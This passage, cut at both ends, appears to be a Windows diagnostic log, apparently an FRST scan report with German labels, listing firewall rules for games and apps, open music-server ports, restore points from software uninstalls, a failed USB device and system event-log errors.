User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [UDP Query 
User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [UDP Query User{0A39A2D1-3CAD-4DEE-BFD9-AD76B69202F7}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe FirewallRules: [{ABF58F19-4D87-4BE8-A373-55D7E1D64B7A}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{E9500049-D9E9-4E8B-A598-216A386F8B2C}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe FirewallRules: [{6B35CD45-1CCB-44FE-8E73-3326D85DEF6B}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: [{81BFC3EA-16DF-4E60-B196-7E489C7383B7}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe FirewallRules: 
[{81D600BE-5020-4F81-BFB0-4BF18DA2B05D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6E5A5B32-5FA5-4BC2-A041-480153DF1E83}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{6347001A-5F4B-4B99-BB7A-524AA41C0AD0}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{56D9A896-9B47-43D5-98CA-538A542BD200}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFSP.exe FirewallRules: [{D9FC3B0B-F50C-4BC2-BF3F-CDE2F2C9A290}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{5A1C6FA4-8139-4243-B3B8-47B3EFB3EA53}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{A213CF29-EB9C-4BFC-A988-0B1F4472789D}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{D64B53D7-E8CD-40BD-9C91-72A20AD3970A}] => (Allow) G:\Program Files (x86)\Ubisoft\Assassin's Creed IV Black Flag\AC4BFMP.exe FirewallRules: [{F2578368-AA70-433E-B35A-5009C86D1E17}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{9F5E0788-335F-42C1-A22C-50F7D9CDC79D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{32406C39-953C-460B-AFE6-CDE4B232D40D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [TCP Query User{3EDA9F19-1F96-411E-8C1C-F563E58A3ADE}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [UDP Query User{68DEDDE0-6036-412F-AA44-08A74EE184D7}G:\games\world_of_warplanes\wowplauncher.exe] => (Allow) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{AE314296-B5C7-4DF4-9374-D088F3A08615}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: 
[{FDD2B1D2-8138-4DF1-B121-ED318FBA427B}] => (Block) G:\games\world_of_warplanes\wowplauncher.exe FirewallRules: [{29D2BACC-43CD-4803-B503-59899E87FD68}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [{FECFCD89-9DE5-49A3-B3A4-56AC70E40CD6}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\mordheim\mordheim.exe FirewallRules: [TCP Query User{D8825ED6-64AE-45C5-B113-ECB7858A95CA}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [UDP Query User{7E395701-8E52-444C-8DA5-90B6FF036164}G:\program files\cloud imperium games\patcher\cigpatcher.exe] => (Allow) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{413FDA69-6273-4C65-BB74-8CE72A1CF6C4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [{9ADFBB2B-0B80-4A64-8FCB-571605B6D8A4}] => (Block) G:\program files\cloud imperium games\patcher\cigpatcher.exe FirewallRules: [TCP Query User{A6D22F2F-32BB-4C44-8C74-EBDFE4627990}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [UDP Query User{E0FE8A20-C7CF-4897-B34B-C86C940403CA}G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe] => (Allow) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{EBFEFE2F-A517-416E-AB96-B57AFAF058B1}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{37DDA592-72D9-4843-B53B-828006F78A9A}] => (Block) G:\program files\cloud imperium games\starcitizen\public\bin64\starcitizen.exe FirewallRules: [{7E09FB06-AEB8-47CD-B06C-2F012CFD67D8}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{44C7FB35-3400-4EEB-A7E0-CAABCFA9010D}] => 
(Allow) G:\Program Files (x86)\Steam\steamapps\common\Endless Space\EndlessSpace.exe FirewallRules: [{2E30090F-BF18-4888-8C31-BDFB251C40AA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{1E06EE93-F65D-4232-8C20-FF047C2960B3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Terraria\Terraria.exe FirewallRules: [{CB8A9966-C9BA-4D24-8DCF-82CCC446AD7E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [{10D47C8E-1911-4379-B2A7-3DFAF5FECB49}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous Horizons\EDLaunch.exe FirewallRules: [TCP Query User{AE697FDF-95CB-4742-AFE1-175E002D0CDD}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{21CEB7FC-0894-4127-82BF-6C74648C47A4}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [{922401B8-85D9-4FC4-B488-C575AD393F0E}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [{A0BED04D-77EC-44B5-A349-7E6248C82D08}] => (Allow) G:\Program Files (x86)\Origin Games\STAR WARS Battlefront\starwarsbattlefront.exe FirewallRules: [TCP Query User{6D865778-4B1C-48E3-8EDE-88B07DE0E8CE}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [UDP Query User{13FFCB9B-2BE1-472F-96CE-29F783837766}G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe] => (Allow) G:\program files (x86)\origin games\star wars battlefront\starwarsbattlefront.exe FirewallRules: [{CB31CEEC-1545-42AA-9B71-7426B88BFB5E}] => (Allow) G:\Program Files 
(x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [{61419720-4278-4910-BFAC-E93AF187E7DF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\GalCiv3.exe FirewallRules: [TCP Query User{9A8EDE9E-029B-47AF-A061-7525FEE74527}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [UDP Query User{9F7A08A0-4DBC-40F2-89AC-5BA6AA0CD90F}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe FirewallRules: [TCP Query User{B00611DA-10FE-4A45-9987-D344F69AFE59}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [UDP Query User{3CE54E08-6C8E-4877-B238-A663ACEC403D}G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe] => (Allow) G:\program files (x86)\warhorse studios\kcd_beta\bin\win64\kingdomcome.exe FirewallRules: [TCP Query User{02FD6615-749C-459B-9329-E9D3D840FD87}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [UDP Query User{0849F913-291A-4888-8D45-66C5704945BD}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe FirewallRules: [TCP Query User{6D5C88B3-7D5E-4872-82F0-A3CB31A96B85}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{5CB68C43-4C63-438F-98EB-749826872FBE}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) 
C:\users\*****\appdata\roaming\spotify\spotify.exe FirewallRules: [{75747872-239D-4591-85C3-EC5A1D6EC796}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{A5A856A7-452C-421E-A65C-1EB4C29A172C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame_BE.exe FirewallRules: [{1508135B-998A-4813-8812-87AD3D57489A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{DA814E91-168A-465A-9266-00F76B832A69}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\ARK\ShooterGame\Binaries\Win64\ShooterGame.exe FirewallRules: [{4C6E3958-1227-48B4-A938-C23D7B034480}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{01193C79-C53E-4CB8-B7C2-5F0F8EC74B25}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\No Man's Sky\Binaries\NMS.exe FirewallRules: [{F72D0DCF-6A2B-4F0C-BBA7-0C8DD6BCC27F}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{A93DA08B-800F-4E4E-8BBB-368C93F6080A}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\gu.exe FirewallRules: [{D3231BE9-FB26-4B52-A06F-C76F95C54121}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{C17DA570-D7C5-4124-A736-398D9CEBB379}] => (Allow) G:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\games\Rayman Origins\Rayman Origins.exe FirewallRules: [{F87F2FB5-8593-4BFD-B2A9-A08FA335DB4D}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DD2FEDAC-B152-4BA8-A685-87BB03D81555}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Master of Orion\MasterOfOrion.exe FirewallRules: [{DC75C909-CEA5-498F-B98D-A5FA3673F55B}] => (Allow) G:\Program Files 
(x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{67EB36C9-7978-4E8B-B4E2-D789597F76F7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [TCP Query User{1B9BBC75-D6A3-451D-9402-7BF428C6B964}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{9F8F6E86-D511-4F2C-892D-703134694F63}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{8AF18EE4-FBC6-4D0A-BC4E-D3F149CDB2A9}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{87EB15D3-94CF-4471-A526-5B82C235CB03}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tom Clancy's The Division\thedivision.exe FirewallRules: [{CA69E6B0-A279-4343-AF7A-0AF44A42D8DA}] => (Block) LPort=445 FirewallRules: [{E924BE7C-390D-4029-AF9F-F7E5005B87A0}] => (Block) LPort=445 FirewallRules: [{B3BD5C1D-80FD-4A00-BF14-9B9B1B4C9F15}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [{38D2290F-C6D2-4166-A44D-3ECDEEA6A2AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe FirewallRules: [TCP Query User{50D16B60-67AB-488A-AE5C-E61D97824CA9}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [UDP Query User{19EF7346-06B2-43ED-8F39-A83414013D6C}G:\program files (x86)\hearthstone\hearthstone.exe] => (Allow) G:\program files (x86)\hearthstone\hearthstone.exe FirewallRules: [{6DB5B824-C375-4374-B640-5A46AE0D856B}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{2F010EF3-6120-4A95-B9C0-5CD981CCF542}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: 
[{09CB81DB-7550-4F7B-B023-18A4A3920F6B}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{692B4130-23BF-4C1F-96BC-5039D5E48ED4}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{C0A906DA-FAB3-4A93-97C7-F59B870BDFA1}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{BF2178FB-4544-451B-9B32-D5A4C31F4FCA}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Warframe.x64.exe FirewallRules: [{F37A5F7E-D189-4815-A302-2891EAFA783C}] => (Allow) C:\Users\*****\AppData\Local\Warframe\Downloaded\Public\Tools\Launcher.exe FirewallRules: [{7C735814-90CD-4F3A-A051-211C0BBD9495}] => (Allow) G:\Program Files (x86)\Warframe\Downloaded\Public\Tools\RemoteCrashSender.exe FirewallRules: [{DAC4BDBD-6873-4C9D-A3D9-1CF7A9DBD691}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{D08800A7-21B0-4FDF-93DC-9BBF11F5F80E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\TheLongDark\tld.exe FirewallRules: [{607765EA-BFDC-4528-857D-9DB7207FA061}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{9C65B7A2-4B3D-4E1D-98A3-4C2662F366C7}] => (Allow) G:\Program Files (x86)\Origin Games\SimCity\SimCity\SimCity.exe FirewallRules: [{FEA59EF6-632E-4765-9BA8-17DBA601260E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{5B99B3A8-F2E7-4326-BBDD-FC046CAA57D7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Total War WARHAMMER\launcher\launcher.exe FirewallRules: [{6AB67BB1-CE72-42C7-B1A7-686993AA20AC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{AFFDAA2A-A01E-4601-9977-4EC518739200}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{064DE8B2-CDAB-4E65-AA20-4F44B1C38564}] => (Allow) 
C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe FirewallRules: [{F30A19A3-5234-4E0D-8B86-B393932138B4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{EA33863E-67CD-4843-A527-7077DE793E0E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{ED9892D6-6D9D-426F-97C9-38483F4C7806}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe FirewallRules: [{CBC3E334-A8AA-4AA9-8952-0DDC79CEEFC1}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe DomainProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) DomainProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) DomainProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) DomainProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) DomainProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) DomainProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) DomainProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) DomainProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) DomainProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) DomainProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) DomainProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) DomainProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) DomainProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) DomainProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) DomainProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) DomainProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp DomainProfile\GloballyOpenPorts: [3483:TCP] 
=> Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp DomainProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [9000:TCP] => Enabled:Logitech Media Server 9000 tcp (UI) StandardProfile\GloballyOpenPorts: [9001:TCP] => Enabled:UE Music Library 9001 tcp (UI) StandardProfile\GloballyOpenPorts: [9002:TCP] => Enabled:UE Music Library 9002 tcp (UI) StandardProfile\GloballyOpenPorts: [9003:TCP] => Enabled:UE Music Library 9003 tcp (UI) StandardProfile\GloballyOpenPorts: [9004:TCP] => Enabled:UE Music Library 9004 tcp (UI) StandardProfile\GloballyOpenPorts: [9005:TCP] => Enabled:UE Music Library 9005 tcp (UI) StandardProfile\GloballyOpenPorts: [9006:TCP] => Enabled:UE Music Library 9006 tcp (UI) StandardProfile\GloballyOpenPorts: [9007:TCP] => Enabled:UE Music Library 9007 tcp (UI) StandardProfile\GloballyOpenPorts: [9008:TCP] => Enabled:UE Music Library 9008 tcp (UI) StandardProfile\GloballyOpenPorts: [9009:TCP] => Enabled:UE Music Library 9009 tcp (UI) StandardProfile\GloballyOpenPorts: [9010:TCP] => Enabled:UE Music Library 9010 tcp (UI) StandardProfile\GloballyOpenPorts: [9100:TCP] => Enabled:UE Music Library 9100 tcp (UI) StandardProfile\GloballyOpenPorts: [8000:TCP] => Enabled:UE Music Library 8000 tcp (UI) StandardProfile\GloballyOpenPorts: [10000:TCP] => Enabled:UE Music Library 10000 tcp (UI) StandardProfile\GloballyOpenPorts: [9090:TCP] => Enabled:UE Music Library 9090 tcp (UI) StandardProfile\GloballyOpenPorts: [3483:UDP] => Enabled:UE Music Library 3483 udp StandardProfile\GloballyOpenPorts: [3483:TCP] => Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:TCP] => 3483:TCP:*:Enabled:UE Music Library 3483 tcp StandardProfile\GloballyOpenPorts: [3546:UDP] => 3483:UDP:*:Enabled:UE Music Library 3483 udp ==================== Wiederherstellungspunkte ========================= 31-07-2017 01:36:50 
Removed simplitec simplicheck 01-08-2017 12:29:49 Malwarebytes Anti-Rootkit Restore Point 05-08-2017 22:59:27 Revo Uninstaller's restore point - Adobe Acrobat Reader DC - Deutsch 05-08-2017 23:02:31 Revo Uninstaller's restore point - 7-Zip 9.20 (x64 edition) 05-08-2017 23:03:57 Revo Uninstaller's restore point - Avira Antivirus 05-08-2017 23:06:04 Revo Uninstaller's restore point - Advanced SystemCare 10 05-08-2017 23:11:19 Revo Uninstaller's restore point - Avira System Speedup 05-08-2017 23:12:26 Revo Uninstaller's restore point - Batman: Arkham City GOTY 05-08-2017 23:13:06 Revo Uninstaller's restore point - Avira Software Updater 05-08-2017 23:13:13 Removed Avira Software Updater 05-08-2017 23:13:50 Revo Uninstaller's restore point - Avira Connect 05-08-2017 23:14:16 Revo Uninstaller's restore point - Avira Phantom VPN 05-08-2017 23:14:52 Revo Uninstaller's restore point - Avira Connect 05-08-2017 23:15:50 Revo Uninstaller's restore point - Deus Ex: Mankind Divided™ 05-08-2017 23:16:28 Revo Uninstaller's restore point - Dying Light 05-08-2017 23:16:56 Revo Uninstaller's restore point - Fallout: New Vegas 05-08-2017 23:17:21 Revo Uninstaller's restore point - Driver Booster 4.5 05-08-2017 23:17:55 Revo Uninstaller's restore point - Command & Conquer™ Red Alert 2 and Yuri’s Revenge 05-08-2017 23:18:51 Revo Uninstaller's restore point - Mozilla Firefox 54.0.1 (x86 de) 05-08-2017 23:19:55 Revo Uninstaller's restore point - System Shock 2 05-08-2017 23:20:31 Revo Uninstaller's restore point - Smart Defrag 5 05-08-2017 23:22:02 Revo Uninstaller's restore point - Metro: Last Light 05-08-2017 23:22:32 Revo Uninstaller's restore point - Futuremark SystemInfo 05-08-2017 23:22:38 Removed Futuremark SystemInfo 05-08-2017 23:23:32 Revo Uninstaller's restore point - The Banner Saga 2 05-08-2017 23:24:33 Revo Uninstaller's restore point - State of Decay 05-08-2017 23:25:37 Revo Uninstaller's restore point - 3DMark 05-08-2017 23:27:30 Revo Uninstaller's restore point - State 
of Decay 05-08-2017 23:28:01 Revo Uninstaller's restore point - WestwoodOnline 05-08-2017 23:28:29 Revo Uninstaller's restore point - WestwoodOnline 05-08-2017 23:29:30 Revo Uninstaller's restore point - Skype Click to Call 05-08-2017 23:30:19 Revo Uninstaller's restore point - Skype Click to Call 05-08-2017 23:41:58 Revo Uninstaller's restore point - Jade Empire 06-08-2017 00:18:38 Revo Uninstaller's restore point - Free Studio 06-08-2017 00:19:24 Revo Uninstaller's restore point - IObit Uninstaller 06-08-2017 00:31:22 Revo Uninstaller's restore point - Free Studio 06-08-2017 00:33:21 Revo Uninstaller's restore point - Trojan Remover 06-08-2017 00:59:33 Revo Uninstaller's restore point - GNU Image Manipulation Program ==================== Fehlerhafte Geräte im Gerätemanager ============= Name: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Description: Unbekanntes USB-Gerät (Fehler beim Anfordern einer Gerätebeschreibung.) Class Guid: {36fc9e60-c465-11cf-8056-444553540000} Manufacturer: (Standard-USB-Hostcontroller) Service: Problem: : Windows has stopped this device because it has reported problems. (Code 43) Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation. ==================== Fehlereinträge in der Ereignisanzeige: ========================= Applikationsfehler: ================== Error: (08/06/2017 12:59:33 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. 
Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {2b4a2dd8-1805-4ac5-9545-b2b4e5183952} Error: (08/06/2017 12:54:05 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:53:54 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und ausgeschlossenen Adressen konnte vvon Windows Search nicht verarbeitet werden. Fehler: <30, 0x80040d07, "iehistory://{S-1-5-21-1566530412-1856523912-1524002813-1001}/">. Error: (08/06/2017 12:33:21 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer". Details: AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed System Error: Das System kann die angegebene Datei nicht finden. . Error: (08/06/2017 12:33:21 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2} Error: (08/06/2017 12:31:23 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: ) Description: Fehler beim Kryptografiedienst während der Verarbeitung des "OnIdentity()"-Aufrufobjekts "System Writer". 
Details: AddWin32ServiceFiles: Unable to back up image of service IObitUnSvr since QueryServiceConfig API failed System Error: Das System kann die angegebene Datei nicht finden. . Error: (08/06/2017 12:31:21 AM) (Source: VSS) (EventID: 8194) (User: ) Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert . Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess. Vorgang: Generatordaten werden gesammelt Kontext: Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220} Generatorname: System Writer Generatorinstanz-ID: {aed6dc58-88ad-4623-913e-10f437d01ec2} Error: (08/06/2017 12:23:06 AM) (Source: Windows Search Service) (EventID: 1019) (User: ) Description: Die Liste der eingeschlossenen und 